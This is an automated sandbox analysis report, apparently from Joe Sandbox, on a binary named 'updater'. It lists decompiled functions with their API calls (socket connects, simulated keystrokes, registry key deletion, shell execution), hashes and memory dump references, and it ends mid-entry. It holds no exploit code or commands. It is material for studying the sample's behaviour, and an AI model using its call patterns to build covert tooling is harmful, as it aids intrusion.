Instruction Fuzzy Hash: EA21CFB26012057BD20477298EC2FAB77ACEE65784B088321FD16A63C3F710DF11CAA5

Function 00C1F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

Part of subcall function 00BC436A: _wcscpy.LIBCMT ref: 00BC438D

_wcstok.LIBCMT ref: 00C1F2D7
_wcscpy.LIBCMT ref: 00C1F366
_memset.LIBCMT ref: 00C1F399

Strings

X, xrefs: 00C1F3D6

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: a6d85af077a14c70b0cc010a6c83f6735acb58be50373f58eb30b2280be5d58b
Instruction ID: 0d0c1a0e4103fd7424ac69b3201e8ac2537294fde7cab773ec029603e1e988d3
Opcode Fuzzy Hash: a6d85af077a14c70b0cc010a6c83f6735acb58be50373f58eb30b2280be5d58b
Instruction Fuzzy Hash: ACC19F715047409FC724EF68C891EAAB7E4FF86310F00496DF899972A2DB70ED46DB82

Function 00C271EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C272EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C2730C
WSAGetLastError.WSOCK32(00000000), ref: 00C2731F
htons.WSOCK32(?,?,?,00000000,?), ref: 00C273D5
inet_ntoa.WSOCK32(?), ref: 00C27392

Part of subcall function 00C0B4EA: _strlen.LIBCMT ref: 00C0B4F4
Part of subcall function 00C0B4EA: _memmove.LIBCMT ref: 00C0B516

_strlen.LIBCMT ref: 00C2742F
_memmove.LIBCMT ref: 00C27498

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 290cbbdf4bfbd779cb00a6a3a8ef1621ab2398a76d92dd07a35f01cbcb9ba0fb
Instruction ID: 7ca5b255e6a0a71786bff7623484f0433b7ef805b1cbe0cc4103237cb5452acc
Opcode Fuzzy Hash: 290cbbdf4bfbd779cb00a6a3a8ef1621ab2398a76d92dd07a35f01cbcb9ba0fb
Instruction Fuzzy Hash: 2D81C071508210ABD310EB24DC91F6BB7E8EF84714F108A5DF9569B292DB70EE01CB92

Function 00BB1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df8b156dc0c1965e3b7782778919b19bfb553f9b0e94597a6295db0ba1b8ab74
Instruction ID: 6cf1df252753434ea918b64c41c286911d1ff43ccecab5b8dd6f64ab2df62855
Opcode Fuzzy Hash: df8b156dc0c1965e3b7782778919b19bfb553f9b0e94597a6295db0ba1b8ab74
Instruction Fuzzy Hash: DB717A74900109EFCB058F59CC98EFEBBB9FF86310F648599F915AA251C770AA51CBA0

Function 00C3B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01725348), ref: 00C3BA5D
IsWindowEnabled.USER32(01725348), ref: 00C3BA69
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C3BB4D
SendMessageW.USER32(01725348,000000B0,?,?), ref: 00C3BB84
IsDlgButtonChecked.USER32(?,?), ref: 00C3BBC1
GetWindowLongW.USER32(01725348,000000EC), ref: 00C3BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C3BBFB

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 9d8e56c3fd7d687507ef3cb95d4768c9821154e36b7f3c57c625a10b1117edd0
Instruction ID: 3aa4e9ed2bd136e1b198be4f7849886650a1ed78f1d7045f5bc93200d5967613
Opcode Fuzzy Hash: 9d8e56c3fd7d687507ef3cb95d4768c9821154e36b7f3c57c625a10b1117edd0
Instruction Fuzzy Hash: A271C134614608AFDB259F54C895FFAB7B9FF09300F144059FA6A972A1CB31AE50EB60

Function 00C2FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C2FB31
_memset.LIBCMT ref: 00C2FBFA
ShellExecuteExW.SHELL32(?), ref: 00C2FC3F

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

Part of subcall function 00BC436A: _wcscpy.LIBCMT ref: 00BC438D

GetProcessId.KERNEL32(00000000), ref: 00C2FCB6
CloseHandle.KERNEL32(00000000), ref: 00C2FCE5

Strings

@, xrefs: 00C2FC0E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: de951c6be32d267e8f8ae988c9614066e91b11e8513661f4ec751abe8ff2e410
Instruction ID: 1d3ccf8933d87362d62663c1751d7f488c30fc02d5f9ddea940ddbb98e1bedb4
Opcode Fuzzy Hash: de951c6be32d267e8f8ae988c9614066e91b11e8513661f4ec751abe8ff2e410
Instruction Fuzzy Hash: 8D61A275A0061D9FCB14EF54D491AAEBBF5FF48310F1084ADE856AB752CB30AD42CB90

Function 00C1174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C1178B
GetKeyboardState.USER32(?), ref: 00C117A0
SetKeyboardState.USER32(?), ref: 00C11801
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C1182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C1184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C11894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C118B7

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: de88ca104cc6b09a9d55ccf5ec6d2adc492b958cb9cc99cd5f30689c1feda76d
Instruction ID: 461572c21ce2d3d1de6f48b02e117acb5defd436ff56def2c43c2a745bb60768
Opcode Fuzzy Hash: de88ca104cc6b09a9d55ccf5ec6d2adc492b958cb9cc99cd5f30689c1feda76d
Instruction Fuzzy Hash: 9651D2A0A187D53DFB3682348855BFA7EE96B07704F0C8589EAE5458C2D29CAEC4F750

Function 00C11565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C115A4
GetKeyboardState.USER32(?), ref: 00C115B9
SetKeyboardState.USER32(?), ref: 00C1161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C11646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C11663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C116A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C116C8

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 2507208ebb59ec8da67d9b9e320a41fed18ef653a35edebc208fb161965a735b
Instruction ID: 171ef88703356e5a9b5b71f124ba910b3c54c707abd392bd263ae684ea0928b3
Opcode Fuzzy Hash: 2507208ebb59ec8da67d9b9e320a41fed18ef653a35edebc208fb161965a735b
Instruction Fuzzy Hash: DA51E5A05447D53DFB3287248C45BFABEA9AF07300F0C8489FAE5469C2D699ADD4F760

Function 00C15BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C15BC5
_wcsncpy.LIBCMT ref: 00C15BFA
_wcsncpy.LIBCMT ref: 00C15C2C
_wcsncpy.LIBCMT ref: 00C15C5F
_wcsncpy.LIBCMT ref: 00C15CA1
_wcsncpy.LIBCMT ref: 00C15CDB
_wcsncpy.LIBCMT ref: 00C15D0A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: b6180b77e0d3c3c484b6e15a3f99fd1faf0341d4d1fe175e5076f596df028930
Instruction ID: 729f99dd51d7811e66183f93e0e011b247bd8dcc5242e27b5d662a8ce663a4a1
Opcode Fuzzy Hash: b6180b77e0d3c3c484b6e15a3f99fd1faf0341d4d1fe175e5076f596df028930
Instruction Fuzzy Hash: 7D417FA5C20658B6CB51FBB488469CFB3F8AF09310F508896E519E3221F734A759C3E6

Function 00C13B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C14BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C13B8A,?), ref: 00C14BE0

Part of subcall function 00C14BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C13B8A,?), ref: 00C14BF9

lstrcmpiW.KERNEL32(?,?), ref: 00C13BAA
_wcscmp.LIBCMT ref: 00C13BC6
MoveFileW.KERNEL32(?,?), ref: 00C13BDE
_wcscat.LIBCMT ref: 00C13C26
SHFileOperationW.SHELL32(?), ref: 00C13C92

Strings

\*.*, xrefs: 00C13C20

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 40c3598ac41648d3a8364306c9e49f8b2e60d6d321aee9030895c80a8ca3f11a
Instruction ID: 255d3d0360d954223e722fade55393e8a14fe3ed4fef8c9f332abfec22f45eed
Opcode Fuzzy Hash: 40c3598ac41648d3a8364306c9e49f8b2e60d6d321aee9030895c80a8ca3f11a
Instruction Fuzzy Hash: 9C418E7150C3849AC756EF64C481ADFB7E8AF8A340F50096EF49AD3291EB34D7889752

Function 00C378B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C378CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C37976
IsMenu.USER32(?), ref: 00C3798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C379D6
DrawMenuBar.USER32 ref: 00C379E9

Strings

0, xrefs: 00C378C3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 8c6b9c944f381a63056e5f8850a38922b67199e5f6f5a531079b583ff87229be
Instruction ID: fe6209cbc063f707dfb96ea2a95106f84cd162465057afeffb020d43ecbb1920
Opcode Fuzzy Hash: 8c6b9c944f381a63056e5f8850a38922b67199e5f6f5a531079b583ff87229be
Instruction Fuzzy Hash: 624137B5A14309EFDB20DF54D884B9EBBF5FB09311F048269E955A7250C730AE50CFA0

Function 00C31602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C31631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C3165B
FreeLibrary.KERNEL32(00000000), ref: 00C31712

Part of subcall function 00C31602: RegCloseKey.ADVAPI32(?), ref: 00C31678
Part of subcall function 00C31602: FreeLibrary.KERNEL32(?), ref: 00C316CA
Part of subcall function 00C31602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C316ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C316B5

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 98be67e7e4fb950b6d9a882297f77bacb1702b33bfbad90ddc94d11f4d978130
Instruction ID: e4cc34ea4ae0f23217006bb5027545fd7a85dbd431aebe74ef3eae58743e49de
Opcode Fuzzy Hash: 98be67e7e4fb950b6d9a882297f77bacb1702b33bfbad90ddc94d11f4d978130
Instruction Fuzzy Hash: D7312BB5911109BFDB149B90DC8AFFEB7BCEF09300F180169F912A2151EA749F459BA0

Function 00C368F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C36911
GetWindowLongW.USER32(01725348,000000F0), ref: 00C36944
GetWindowLongW.USER32(01725348,000000F0), ref: 00C36979
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C369AB
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C369D5
GetWindowLongW.USER32(00000000,000000F0), ref: 00C369E6
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C36A00

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: e51ce3092cfbfd20088f324ae19e010d33179f745c3066eed86ef4c84e9651f5
Instruction ID: acc8b3952087ef3a1aae96338aa1820fe42a527ba89106c9b419ee27feec4e2f
Opcode Fuzzy Hash: e51ce3092cfbfd20088f324ae19e010d33179f745c3066eed86ef4c84e9651f5
Instruction Fuzzy Hash: 9B317E35654254AFDB20CF18DC88F6837E1FB4A360F2981A4FA199F2B2CB71AD50DB51

Function 00C0E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0E2F0
SysAllocString.OLEAUT32(00000000), ref: 00C0E2F3
SysAllocString.OLEAUT32(?), ref: 00C0E311
SysFreeString.OLEAUT32(?), ref: 00C0E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 00C0E33F
SysAllocString.OLEAUT32(?), ref: 00C0E34D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: e85ad5312a5a5a545dcf628ff86a707f9b9fece8ee0021cac594cdb6f5a2079e
Instruction ID: 3218501590b13a43c81b99da10337617f867f75a93f4258e28e73ea80c153ca4
Opcode Fuzzy Hash: e85ad5312a5a5a545dcf628ff86a707f9b9fece8ee0021cac594cdb6f5a2079e
Instruction Fuzzy Hash: F2218376644219AFDB10DFA8DC88DBF77ACFB09360B148525FE14DB2A0D670AD41CB60

Function 00C2685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C28475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C284A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C268B1
WSAGetLastError.WSOCK32(00000000), ref: 00C268C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C268F9
connect.WSOCK32(00000000,?,00000010), ref: 00C26902
WSAGetLastError.WSOCK32 ref: 00C2690C
closesocket.WSOCK32(00000000), ref: 00C26935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C2694E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 39d9f6cb10b30b09a6ad63a85bca4f39af390222c830e18c7dbcab3d8df9652a
Instruction ID: fe45e3431a62913e175409cb47b98872daf203457b5900dc43ed821322dd1d06
Opcode Fuzzy Hash: 39d9f6cb10b30b09a6ad63a85bca4f39af390222c830e18c7dbcab3d8df9652a
Instruction Fuzzy Hash: 8231D171600228AFDB10AF24DC85BBE77F9EB45720F044069FA05AB2D1CBB0AD44CBA1

Function 00C0E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0E3CB
SysAllocString.OLEAUT32(00000000), ref: 00C0E3CE
SysAllocString.OLEAUT32 ref: 00C0E3EF
SysFreeString.OLEAUT32 ref: 00C0E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 00C0E412
SysAllocString.OLEAUT32(?), ref: 00C0E420

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ca5584d800336c7c3c814c6e09c7457a1c3238070df50aad3f3488b6f4d0f0a7
Instruction ID: ff475cd7300d0072fea7e8757de18b8eed58a523e8e370438d00ebb1997aa7c5
Opcode Fuzzy Hash: ca5584d800336c7c3c814c6e09c7457a1c3238070df50aad3f3488b6f4d0f0a7
Instruction Fuzzy Hash: 24215635644204AFEB149FE8DC89EAE77ECFB09360B508529FB15CB2A1D670ED41CB64

Function 00C37BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BB214F
Part of subcall function 00BB2111: GetStockObject.GDI32(00000011), ref: 00BB2163
Part of subcall function 00BB2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C37C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C37C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C37C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C37C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C37C8A

Strings

Msctls_Progress32, xrefs: 00C37C28

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

